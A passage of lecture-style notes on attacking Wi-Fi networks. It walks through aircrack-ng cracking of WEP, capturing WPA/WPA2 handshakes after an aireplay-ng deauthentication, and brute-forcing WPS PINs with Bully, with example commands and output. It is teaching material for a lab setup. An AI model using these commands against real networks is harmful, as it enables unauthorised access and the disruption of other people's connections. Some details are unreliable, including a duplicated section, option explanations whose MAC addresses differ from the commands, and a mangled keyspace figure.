• -h is our Alfa card MAC address.
• mon0 is the interface.
Cracking the Key

• Use command:
• root@kali:~# aircrack-ng -b 00:23:69:F5:B4:2B book*.capu
• Opening book-01.cap
• Attack will be restarted every 5000 captured ivs.
• Starting PTW attack with 239400 ivs.
• KEY FOUND! [ 2C:85:8B:B6:31 ] v
• Decrypted correctly: 100%
Challenges with WEP Cracking
• Access points could use MAC filtering to allow only wireless cards with certain MAC
addresses to
• connect, and if your Alfa card isn’t on the list, your fake authentication attempt will fail.
• To bypass MAC filtering, you could use a tool like MAC Changer in Kali to spoof a MAC
address and create an accepted value.
• Keep in mind that WEP keys are always crackable if we can gather enough packets, and
for security reasons, WEP encryption should not be used in production.
• It’s worth noting that the Wifite tool, installed by default in Kali Linux, behaves as a
wrapper around
Wi-Fi Protected Access

• Wi-Fi Protected Access (WPA), also known as Temporal Key Integrity Protocol (TKIP)
• WPA uses the same underlying algorithm as WEP (RC4) but seeks to address WEP’s
weaknesses by adding keystream randomness to IVs and integrity to ICV.
• WEP, which uses a 40- or 104-bit key combined with weak IVs for each packet, WPA
generates a 148-bit key for each packet to ensure that each packet is encrypted with a
unique keystream.
• Additionally, WPA replaces WEP’s weak CRC-32 message integrity check with a
message authentication code (MAC) algorithm called Michael, to prevent attackers from
easily calculating the resulting changes to the ICV when a bit is flipped.
• Though both WPA and even WPA2 have their weaknesses, the most common
vulnerability is the use of weak passphrases.
WPA2
• WPA2 was built from the ground up to provide a secure encryption system for wireless networks. It
implements an encryption protocol built specifically for wireless security called Counter Mode
with Cipher Block Chaining Message Authentication Code Protocol (CCMP).
• CCMP is built on the Advanced Encryption Standard (AES).
• WPA and WPA2 support both personal and enterprise setups.
• WPA/WPA2 personal uses a pre-shared key, similar to WEP. WPA/WPA2 enterprise adds an
additional element called a Remote Authentication Dial-In User Service (RADIUS) server to
manage client authentication.
The Enterprise Connection Process
• In WPA/WPA2 enterprise networks, the client connection process comprisesfour steps
• First the client and the access point agree on mutually supported security protocols. Then, based
on the
• authentication protocol chosen, the access point and the RADIUS server exchange messages to
generate a master key.
• Once a master key is generated, a message that authentication was successful is sent to the
access point and passed on to the client, and the master key is sent to the access point.
• The access point and the client exchange and verify keys for mutual authentication, message
encryption, and message integrity via a four-way handshake.
• Following key exchange, traffic between the client and the access point is secured with WPA or
WPA/WPA2 enterprise connection
The Personal Connection
Process
• The WPA/WPA2 personal connection process is slightly simpler than the enterprise one: No
RADIUS server is required, and the entire process is between the access point and the client.
• No authentication or master key step occurs, and instead of a RADIUS server and master key,
WPA/WPA2 personal use pre-shared keys, which are generated using pre-shared passphrases.
• The WPA/WPA2 personal passphrase that you enter when you connect to a secured network is
static, whereas enterprise setups use dynamic keys generated by the RADIUS server.

The Four-Way Handshake

• In the first phase of the connection between an access point and supplicant (client), a pairwise
master key (PMK), which is static throughout the entire session, is created.
• This is not the key that will be used for encryption itself, but it will be used during the second
phase, where a four-way handshake will take place between access point and client, with the
purpose of establishing a channel of communication and exchanging the encryption keys used
for further data communication.
WPA/WPA2 four-way handshake between client and access point
• This PMK is generated from the following:
• • The passphrase (pre-shared key, or PSK)
• • The access point’s SSID
• • The SSID length
• • The number of hashing iterations (4096)
• • The resulting length in bits (256) of the generated shared key (PMK)
• anyone who knows the passphrase and the access point’s SSID can use the PBKDF2
algorithm to generate the correct PMK.
• During the four-way handshake, a pairwise transient key (PTK) is created and used to
encrypt traffic between the access point and the client; a group transient key (GTK) is
exchanged and used to encrypt broadcast traffic.
The PTK is made up of the following:
• • The shared key (the PMK)
• • A random number (nonce) from the access point (ANonce)
• • A nonce from the client (SNonce)
• • The MAC address of the client
• • The MAC address of the access point. These values are fed into the PBKDF2 hashing
algorithm to create the PTK.
WPA/WPA2 four-way handshake between client and access point diagram
explanation:
• The static shared key (PMK) is never sent over the air, because both the access point
and the client know the passphrase (PSK) and, thus, can generate the shared key
independently.
• The shared nonces and MAC addresses are used by both the client and the access point
to generate the PTK. In the first step of the four-way handshake, the access point sends
its nonce (ANonce). Next, the client chooses a nonce, generates the PTK, and sends its
nonce (SNonce) to the access point. (The S in SNonce stands for supplicant, another
name for the client in a wireless setup.)
• In addition to sending its nonce, the client sends a message integrity code (MIC) to
guard against forgery attacks. In order to compute the correct MIC, the passphrase
used to generate the pre-shared key must be correct, or the PTK will be wrong.
• The access point independently generates the PTK based on the SNonce and MAC
address sent by the client, then checks the MIC sent by the client.
• If it’s correct, the client has authenticated successfully, and the access point sends
over the GTK plus the MIC to the client.
• In the fourth part of the handshake, the client acknowledges the GTK.
Cracking WPA/WPA2 Keys

The cryptographic algorithms used in WPA and WPA2 are robust enough to stop attackers
from recovering the key simply by capturing enough traffic and performing cryptanalysis.
• To try to guess a weak password, we first need to capture the four-way handshake for
analysis.
• Recall that given the correct passphrase and the SSID of the access point, the PBKDF2
hashing algorithm can be used to generate the shared key (PMK).
• Given the PMK, we still need the ANonce, SNonce, and the MAC addresses of the
access point and client to calculate the PTK.
• the PTK will differ for each client, because the nonces will differ in each four-way
handshake, but if we can capture a four-way
• handshake from any legitimate client, we can use its MAC addresses and nonces to
calculate the PTK for a given passphrase.
Using Aircrack-ng to Crack WPA/WPA2 Keys

• To use Aircrack-ng to crack WPA/WPA2, first set up your wireless access point for WPA2 personal.
• Choose a pre-shared key (passphrase) and then connect your host system to your access point to simulate a real
client.
• To use a wordlist to try to guess the WPA2 pre-shared key (passphrase), we need to capture the four-way handshake
Use command( authenticate)
root@kali:~# airodump-ng -c 6 --bssid 00:23:69:F5:B4:2B -w pentestbook2 mon0
• Enter airodump-ng -c 6 for the channel, --bssid with the base station MAC address, -w to specify the filename for
output (use a different filename than you used in the WEP crackin example), and mon0 for the monitor interface.
• To force a client to reconnect, use Aireplay-ng to send a message to a connected client telling it that it is no longer
connected to the access point.
• When the client reauthenticates, we’ll capture the four-way handshake between the client and access point.
Use command(deauthenticate)
• root@kali:~# aireplay-ng -0 1 -a 00:23:69:F5:B4:2B -c 70:56:81:B2:F0:53 mon0
• The Aireplay-ng options we’ll need are:
• -0 means deauthentication.
• 1 is the number of deauthentication requests to send.
• -a 00:14:6C:7E:40:80 is the MAC address of the base station.
• -c 00:0F:B5:FD:FB:C2 is the MAC address of the client to deauthenticate.
Use command(deauthenticate)
• root@kali:~# aireplay-ng -0 1 -a 00:23:69:F5:B4:2B -c 70:56:81:B2:F0:53 mon0
• The Aireplay-ng options we’ll need are:
• -0 means deauthentication.
• 1 is the number of deauthentication requests to send.
• -a 00:14:6C:7E:40:80 is the MAC address of the base station.
• -c 00:0F:B5:FD:FB:C2 is the MAC address of the client to deauthenticate.

• captured the WPA2 handshake, close Airodump-ng, and open the .cap file in Wireshark
with FileOpenfilename.cap. Once in Wireshark, filter for the eapol protocol to see the
four packets that make up the handshake.
• Next we use Aircrack-ng to test the keys in the wordlist, specifying a list with the -w
option.
• Otherwise, the command is identical to cracking the WEP key. If the correct key is in the
wordlist, it will be recovered with Aircrack-ng.
• This sort of dictionary attack against WPA/WPA2 can be prevented by using a strong
passphrase.
• Aircrack-ng is just one suite of tools for cracking wireless.
Wi-Fi Protected Setup

• Wi-Fi Protected Setup (WPS) was designed to allow users to attach their devices to secure
networks with an eight-digit pin instead of a potentially long and complicated
passphrase.
• When the correct pin is supplied, the access point sends over the passphrase.
• WPS can be vulnerable to brute force attacks if the PIN is not disabled or if the network is configured with push-button WPS and an easily
guessed PIN.

• Problems with WPS

• The last digit of the pin is a checksum for the previous seven digits, so the
keyspace should be 107, or 10,000,000 possible pins.
• when a pin is sent to the access point by the client, the validity of the first four digits and
second four digits is reported separately.
• The first four digits are all in play, so there are 10,000 possibilities. Of the second four
digits, only the first three are in play (1000 possible guesses), so it would take at most
11,000 guesses to brute-force the correct WPS pin.
• This decreases the time required to brute-force to under four hours. The only way to fix this
issue is to disable WPS on the access point.
Cracking WPS with Bully

• Kali provides tools that you can use to implement a brute-force attack against WPS.
• One such tool is Bully.
• We can use Bully to brute-force the WPS pin as well as test a specific pin.
• To use Bully we need the SSID, MAC address, and channel of the access point, which
we found with iwlist.
• Use the -b flag to specify the MAC address, the -e flag for the SSID, and the -c
flag for the channel,
• Use command:
• root@kali:~# bully mon0 -b 00:23:69:F5:B4:2B -e linksys -c 6
• Bully should be able to brute-force the pin in around four hours and recover the
correct pre-shared PIN.
• WPS is enabled by default on many wireless access points and may be an easier way
in than guessing a strong WPA/WPA2 passphrase.
Wireless attack tools
Tools:
• Aircrack-ng
• Wireshark
• Kismet
• Reaver
• Metasploit